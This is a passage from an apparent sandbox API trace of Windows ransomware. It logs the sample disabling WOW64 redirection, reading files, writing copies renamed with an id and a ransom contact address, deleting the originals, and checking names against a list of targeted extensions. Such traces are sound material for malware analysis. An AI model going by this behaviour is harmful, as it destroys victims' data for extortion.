(hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.077] GetTickCount () returned 0x2304d [0052.077] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.185] GetTickCount () returned 0x230ba [0052.185] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.294] GetTickCount () returned 0x23128 [0052.294] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.479] GetTickCount () returned 0x231d4 [0052.479] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.576] GetTickCount () returned 0x23241 [0052.576] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.685] GetTickCount () returned 0x232ae [0052.685] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.810] GetTickCount () returned 0x2332b [0052.810] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0052.920] GetTickCount () returned 0x23399 [0052.920] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.029] GetTickCount () returned 0x23406 [0053.029] GetTickCount () returned 0x23406 [0053.029] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.138] GetTickCount () returned 0x23474 [0053.138] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.248] GetTickCount () returned 0x234e1 [0053.248] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.389] GetTickCount () returned 0x2356e [0053.389] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.497] GetTickCount () returned 0x235db [0053.497] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.607] GetTickCount () returned 0x23648 [0053.607] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.716] GetTickCount () returned 0x236b6 [0053.716] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.825] GetTickCount () returned 0x23723 [0053.825] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0053.966] GetTickCount () returned 0x237b0 [0053.966] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.076] GetTickCount () returned 0x2381d [0054.076] GetTickCount () returned 0x2381d [0054.076] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.185] GetTickCount () returned 0x2388a [0054.185] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.310] GetTickCount () returned 0x23907 [0054.310] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.420] GetTickCount () returned 0x23975 [0054.420] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.529] GetTickCount () returned 0x239e2 [0054.529] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.638] GetTickCount () returned 0x23a50 [0054.638] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.758] GetTickCount () returned 0x23abd [0054.758] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.857] GetTickCount () returned 0x23b2a [0054.857] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0054.972] GetTickCount () returned 0x23b98 [0054.972] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0055.661] GetTickCount () returned 0x23e47 [0055.661] GetTickCount () returned 0x23e47 [0055.661] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0056.107] GetTickCount () returned 0x2400c [0056.107] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0056.491] GetTickCount () returned 0x24183 [0056.491] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0057.200] GetTickCount () returned 0x24442 [0057.200] GetTickCount () returned 0x24442 [0057.200] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0057.974] GetTickCount () returned 0x24750 [0057.974] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0058.572] GetTickCount () returned 0x249a1 [0058.572] GetTickCount () returned 0x249a1 [0058.572] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0059.019] GetTickCount () returned 0x24b67 [0059.019] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0059.989] GetTickCount () returned 0x24f2f [0059.989] GetTickCount () returned 0x24f2f [0059.989] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0060.683] GetTickCount () returned 0x251df [0060.683] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0061.211] GetTickCount () returned 0x253f2 [0061.211] GetTickCount () returned 0x253f2 [0061.211] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0062.079] GetTickCount () returned 0x2574d [0062.079] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0062.858] GetTickCount () returned 0x25a5b [0062.858] GetTickCount () returned 0x25a5b [0062.858] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0063.414] GetTickCount () returned 0x25c8d [0063.414] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0063.884] GetTickCount () returned 0x25e62 [0063.884] GetTickCount () returned 0x25e62 [0063.884] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0064.736] GetTickCount () returned 0x261bd [0064.736] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0065.350] GetTickCount () returned 0x2641f [0065.350] GetTickCount () returned 0x2641f [0065.350] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0065.750] GetTickCount () returned 0x265b5 [0065.750] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0066.202] GetTickCount () returned 0x2677a [0066.203] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0067.254] GetTickCount () returned 0x26b91 [0067.254] GetTickCount () returned 0x26b91 [0067.254] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0067.974] GetTickCount () returned 0x26e60 [0067.974] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0069.031] GetTickCount () returned 0x27286 [0069.031] GetTickCount () returned 0x27286 [0069.031] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0069.688] GetTickCount () returned 0x27516 [0069.688] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0070.345] GetTickCount () returned 0x277a7 [0070.345] GetTickCount () returned 0x277a7 [0070.345] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0070.814] GetTickCount () returned 0x2797b [0070.814] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0070.951] GetTickCount () returned 0x27a08 [0070.951] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0071.342] GetTickCount () returned 0x27b8f [0071.342] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0071.532] GetTickCount () returned 0x27c4a [0071.532] GetTickCount () returned 0x27c4a [0071.532] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0071.674] GetTickCount () returned 0x27cd7 [0071.674] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0071.930] GetTickCount () returned 0x27dd1 [0071.930] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0072.036] GetTickCount () returned 0x27e3e [0072.036] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0072.155] GetTickCount () returned 0x27ebb [0072.155] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0072.280] GetTickCount () returned 0x27f38 [0072.280] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) returned 0x102 [0072.388] GetTickCount () returned 0x27fa6 [0072.388] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x64) Thread: id = 9 os_tid = 0xef8 [0045.447] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3ca0e40 [0045.448] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3cb0e48 [0045.448] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cfc8 [0045.448] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d180 [0045.448] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.448] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x413b020 [0045.451] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce78 [0045.451] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce78, Size=0x20) returned 0x60e9d0 [0045.451] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.451] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.451] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.451] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.451] Wow64DisableWow64FsRedirection (in: OldValue=0x268ff50 | out: OldValue=0x268ff50*=0x0) returned 1 [0045.451] lstrlenW (lpString="kernel32.dll") returned 12 [0045.451] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.451] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.451] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.451] Sleep (dwMilliseconds=0x64) [0045.638] Sleep (dwMilliseconds=0x64) [0045.797] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0045.797] lstrlenW (lpString="GetCurrentRollback.ini") returned 22 [0045.797] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.366] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=156) returned 1 [0046.366] CloseHandle (hObject=0x2c8) returned 1 [0046.367] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 0x20 [0046.367] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.367] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.367] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.367] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.367] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.368] GetLastError () returned 0x0 [0046.368] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x9c, lpOverlapped=0x0) returned 1 [0046.379] WriteFile (in: hFile=0x2d8, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xa0, lpOverlapped=0x0) returned 1 [0046.380] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.380] WriteFile (in: hFile=0x2d8, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x100, lpOverlapped=0x0) returned 1 [0046.380] SetEndOfFile (hFile=0x2d8) returned 1 [0046.380] CloseHandle (hObject=0x2d8) returned 1 [0046.381] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.381] SetEndOfFile (hFile=0x2c8) returned 1 [0046.382] CloseHandle (hObject=0x2c8) returned 1 [0046.382] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0046.382] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 1 [0046.382] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.382] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.382] lstrlenW (lpString=".doc") returned 4 [0046.382] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0046.382] lstrlenW (lpString=".docx") returned 5 [0046.382] lstrcmpiW (lpString1=".docx", lpString2="k.ini") returned -1 [0046.382] lstrlenW (lpString=".pdf") returned 4 [0046.382] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0046.382] lstrlenW (lpString=".xls") returned 4 [0046.382] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0046.383] lstrlenW (lpString=".xlsx") returned 5 [0046.383] lstrcmpiW (lpString1=".xlsx", lpString2="k.ini") returned -1 [0046.383] lstrlenW (lpString=".ppt") returned 4 [0046.383] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0046.383] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.383] lstrlenW (lpString=".zip") returned 4 [0046.383] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0046.383] lstrlenW (lpString=".rar") returned 4 [0046.383] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0046.383] lstrlenW (lpString=".bz2") returned 4 [0046.383] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0046.383] lstrlenW (lpString=".7z") returned 3 [0046.383] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0046.383] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.383] lstrlenW (lpString=".dbf") returned 4 [0046.383] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0046.383] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.383] lstrlenW (lpString=".1cd") returned 4 [0046.383] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0046.383] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.383] lstrlenW (lpString=".jpg") returned 4 [0046.383] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0046.383] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.383] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.383] lstrlenW (lpString=".doc") returned 4 [0046.383] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0046.383] lstrlenW (lpString=".docx") returned 5 [0046.383] lstrcmpiW (lpString1=".docx", lpString2="k.ini") returned -1 [0046.383] lstrlenW (lpString=".pdf") returned 4 [0046.383] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0046.383] lstrlenW (lpString=".xls") returned 4 [0046.384] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0046.384] lstrlenW (lpString=".xlsx") returned 5 [0046.384] lstrcmpiW (lpString1=".xlsx", lpString2="k.ini") returned -1 [0046.384] lstrlenW (lpString=".ppt") returned 4 [0046.384] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0046.384] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.384] lstrlenW (lpString=".zip") returned 4 [0046.384] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0046.384] lstrlenW (lpString=".rar") returned 4 [0046.384] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0046.384] lstrlenW (lpString=".bz2") returned 4 [0046.384] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0046.384] lstrlenW (lpString=".7z") returned 3 [0046.384] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0046.384] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.384] lstrlenW (lpString=".dbf") returned 4 [0046.384] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0046.384] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.384] lstrlenW (lpString=".1cd") returned 4 [0046.384] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0046.384] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0046.384] lstrlenW (lpString=".jpg") returned 4 [0046.384] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0046.384] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0046.384] lstrlenW (lpString="desktop.ini") returned 11 [0046.384] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.436] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=129) returned 1 [0046.436] CloseHandle (hObject=0x2d8) returned 1 [0046.436] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 0x26 [0046.437] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.437] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.437] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.437] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.437] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.439] GetLastError () returned 0x0 [0046.439] ReadFile (in: hFile=0x2d8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x81, lpOverlapped=0x0) returned 1 [0046.439] WriteFile (in: hFile=0x2e0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x90, lpOverlapped=0x0) returned 1 [0046.441] ReadFile (in: hFile=0x2d8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.441] WriteFile (in: hFile=0x2e0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xea, lpOverlapped=0x0) returned 1 [0046.441] SetEndOfFile (hFile=0x2e0) returned 1 [0046.441] CloseHandle (hObject=0x2e0) returned 1 [0046.441] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.441] SetEndOfFile (hFile=0x2d8) returned 1 [0046.442] CloseHandle (hObject=0x2d8) returned 1 [0046.442] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x26) returned 1 [0046.442] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 1 [0046.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.443] lstrlenW (lpString=".doc") returned 4 [0046.443] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0046.443] lstrlenW (lpString=".docx") returned 5 [0046.443] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0046.443] lstrlenW (lpString=".pdf") returned 4 [0046.443] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0046.443] lstrlenW (lpString=".xls") returned 4 [0046.443] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0046.443] lstrlenW (lpString=".xlsx") returned 5 [0046.443] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0046.443] lstrlenW (lpString=".ppt") returned 4 [0046.443] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0046.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.443] lstrlenW (lpString=".zip") returned 4 [0046.443] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0046.443] lstrlenW (lpString=".rar") returned 4 [0046.443] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0046.443] lstrlenW (lpString=".bz2") returned 4 [0046.443] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0046.443] lstrlenW (lpString=".7z") returned 3 [0046.443] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0046.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.443] lstrlenW (lpString=".dbf") returned 4 [0046.443] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0046.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.443] lstrlenW (lpString=".1cd") returned 4 [0046.443] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0046.443] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.443] lstrlenW (lpString=".jpg") returned 4 [0046.444] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0046.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.444] lstrlenW (lpString=".doc") returned 4 [0046.444] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0046.444] lstrlenW (lpString=".docx") returned 5 [0046.444] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0046.444] lstrlenW (lpString=".pdf") returned 4 [0046.444] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0046.444] lstrlenW (lpString=".xls") returned 4 [0046.444] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0046.444] lstrlenW (lpString=".xlsx") returned 5 [0046.444] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0046.444] lstrlenW (lpString=".ppt") returned 4 [0046.444] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0046.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.444] lstrlenW (lpString=".zip") returned 4 [0046.444] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0046.444] lstrlenW (lpString=".rar") returned 4 [0046.444] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0046.444] lstrlenW (lpString=".bz2") returned 4 [0046.444] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0046.444] lstrlenW (lpString=".7z") returned 3 [0046.444] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0046.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.444] lstrlenW (lpString=".dbf") returned 4 [0046.444] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0046.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.444] lstrlenW (lpString=".1cd") returned 4 [0046.444] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0046.444] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0046.444] lstrlenW (lpString=".jpg") returned 4 [0046.444] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0046.445] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0046.445] lstrlenW (lpString="desktop.ini") returned 11 [0046.445] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.445] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=129) returned 1 [0046.445] CloseHandle (hObject=0x2d8) returned 1 [0046.445] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 